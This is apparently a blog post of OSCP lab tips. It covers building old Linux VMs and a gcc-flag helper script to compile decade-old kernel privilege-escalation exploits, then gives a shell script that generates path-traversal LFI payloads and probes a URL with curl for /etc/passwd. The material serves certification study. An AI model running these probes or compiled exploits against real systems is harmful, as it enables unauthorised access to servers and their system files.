Compiling kernel exploits for OSCP, who needs the PWK image?

The Problem – “PWK is outdated and old”

PWK being old and outdated is certainly one of the criticisms of the lab and certification; however, fundamentals are fundamental. There is no arguing that the operating systems in the labs are outdated, though: Windows XP and some very old versions of Linux.

For the Linux kernel exploits that were required (I always tried kernel exploits last in the labs), people seem to struggle to get them to compile. After all, these exploits are more than ten years old, everyone is running a current version of Kali, and some of us are running 64-bit because we love RAM. Of course these old exploits don’t like being compiled on a modern version of Linux, and they especially don’t like being compiled outside a 32-bit environment: a 64-bit Kali produces a 64-bit binary by default, and a 64-bit ELF will not even execute on a 32-bit target, so the compile errors are only half the problem.

Eventually I got tired of looking for the right gcc flags just to get an exploit to compile, so I went down a different path.


Match your dev environment to the target environment

Instead of trying to get my 2019 Kali to compile an exploit like it’s 2011, I used the magic of virtualization to build a few dev servers. That’s a fancy way of saying I spun up three VMs running old versions of Linux to compile on. I just picked a few distros that were close to what I was running into in the PWK labs, downloaded the 32-bit ISOs, installed each one in a VM, and set up Samba shares to move the files around.

If you feel bad about not “Penetrating With Kali” and needing to rely on another OS, go ahead and read the PDF; it does discuss matching your test environment to what you’re trying to attack. If I had taken the time to set up a few VMs at the beginning of my lab time I would have saved myself tens of hours of trying to get things to compile.
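If you do want to stay on Kali for the quick cases, the minimum is to build for the target's architecture and avoid depending on Kali's glibc. The POSIX shell helper below is an added example, not code from the post: it derives gcc flags from the target's `uname -m`, compiles, and checks the result with `file`. The flag set (`-m32`, `-static`, `-fno-stack-protector`, `-std=gnu89`, `-Wno-implicit-function-declaration`) is my choice for decade-old exploit sources, not something the post prescribes, and the target fingerprint in the comments is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): pick gcc flags that match a
# target's fingerprint and verify the binary before copying it over.
#
# Constructed sample fingerprint from a PWK-style 32-bit box (not a real capture):
#   uname -m       -> i686
#   gcc --version  -> gcc (Ubuntu 4.4.3-4ubuntu5) 4.4.3
#   ldd --version  -> ldd (Ubuntu EGLIBC 2.11.1-0ubuntu7) 2.11.1
#
# Why these flags (my assumptions, not the post's):
#   -m32 / -m64      : the ELF class must match the target kernel
#   -static          : a binary linked against Kali's glibc dies on an old
#                      target with "version GLIBC_2.xx not found"
#   -std=gnu89       : old sources rely on implicit declarations and
#                      pre-C99 habits that newer defaults reject
#   -fno-stack-protector : the exploits predate the default canary

# Usage: match_flags <output of uname -m on the target>
# Prints the gcc flags on stdout, returns 1 for an unsupported arch.
match_flags() {
    arch="$1"
    flags="-static -fno-stack-protector -std=gnu89 -Wno-implicit-function-declaration"
    case "$arch" in
        i?86)   flags="-m32 $flags" ;;
        x86_64) flags="-m64 $flags" ;;
        *)      echo "unsupported arch: $arch" >&2; return 1 ;;
    esac
    echo "$flags"
}

# Usage: binary_matches <file(1) output line> <target uname -m>
# Returns 0 only when the ELF class matches and the binary is static.
binary_matches() {
    fileout="$1"; arch="$2"
    case "$arch" in
        i?86)   want="ELF 32-bit" ;;
        x86_64) want="ELF 64-bit" ;;
        *)      return 1 ;;
    esac
    case "$fileout" in
        *"$want"*"statically linked"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage: build_for_target exploit.c i686
# Compiles exploit.c to ./exploit and fails if the result would not run there.
build_for_target() {
    src="$1"; arch="$2"; out="${src%.c}"
    flags=$(match_flags "$arch") || return 1
    gcc $flags -o "$out" "$src" || return 1
    binary_matches "$(file "$out")" "$arch"
}
```

On a 64-bit Kali, `-m32` only works after `apt install gcc-multilib`; if `build_for_target` fails at the gcc step with a missing `bits/` header, that package is what is missing. Static linking makes the binary larger but is exactly what lets you skip the dev VM for the simple cases.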

Ubuntu 11/12/14

I used Ubuntu 12 and 14, but 11 would also be a solid choice. You can download 11 from here and 12 from here. Ubuntu servers seem to be everywhere in the labs.

CentOS 5

CentOS can be a little tricky to set up with a GUI, since installing VMware Tools without a disc just wasn’t fun. I used CentOS 5.3, and then I found a great way to fix your repos (CentOS 5 is end-of-life, so the stock mirrors no longer serve its packages). This will be useful in case you actually need to install a header file or something.

FreeBSD 9

Why just Linux, why not BSD too!? Since the FreeBSD FTP servers are down and only the newer versions are available, I went ahead and downloaded FreeBSD 9 from somewhere sketchy and then verified the hashes against the ones on freebsd.org’s website.

[Screenshots: compiling https://www.exploit-db.com/exploits/15285 (Linux Kernel 2.6.36-rc8 'RDS Protocol' Local Privilege Escalation) on Kali fails ("PC Load Letter? WTF does that mean?"), while on Ubuntu "It just works".]

LFI / RFI – I haven’t been PHPed like that since grade school

By far the thing I struggled the most with during the labs was local and remote file inclusion.

How did I overcome this? No clue. Just kept hitting buttons until it worked most of the time.

Paying attention to whether it needed a file extension or not helped. Sometimes you’ll need to include the .php and sometimes you don’t, and sometimes it needs to be .txt instead. Why? Because PHP hates you, that’s why. (The less satisfying answer is that it depends on whether the vulnerable include() appends an extension to your parameter before opening the file.)
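Rather than hitting buttons at random, it is cheaper to enumerate the few include styles up front. The shell helper below is an added example and not from the post: it generates the payload variants for the three common server-side shapes (a bare include, an include that appends an extension, and the old-PHP null-byte truncation case), and checks a response for the /etc/passwd marker. The parameter name `page`, the traversal depth and the sample responses are my assumptions, constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): enumerate LFI payload variants
# and recognise a hit. Assumed (mine, not the post's): parameter ?page=,
# a webroot no deeper than seven directories from /.

# Usage: lfi_variants <path on the target>
# One candidate per line, one per include style:
#   include($_GET['page'])           -> full filename needed
#   include($_GET['page'] . '.php')  -> omit the extension, PHP adds it back
#   same, but PHP < 5.3.4            -> %00 truncates whatever PHP appends
lfi_variants() {
    target="$1"
    trav="../../../../../../.."
    echo "$trav$target"
    case "$target" in
        *.*) echo "$trav${target%.*}" ;;
    esac
    echo "$trav$target%00"
}

# Usage: passwd_hit <response body>
# Returns 0 when the body contains the root entry of /etc/passwd.
passwd_hit() {
    case "$1" in
        *"root:x:0:0:"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage: lfi_probe http://target/index.php page /etc/passwd
# Needs network; %00 must stay raw, so the value is not URL-encoded.
lfi_probe() {
    base="$1"; param="$2"; target="$3"
    lfi_variants "$target" | while IFS= read -r v; do
        body=$(curl -s "$base?$param=$v")
        if passwd_hit "$body"; then echo "HIT: $param=$v"; fi
    done
}
```

When the hit comes from the extension-stripped variant you have learned the include appends `.php`, which also tells you a hosted payload for RFI will be fetched with `.php` appended; that is the case where naming your file `shell.txt` on the attacker side and passing `shell` stops working, and the reverse case is why `.txt` sometimes is what is needed.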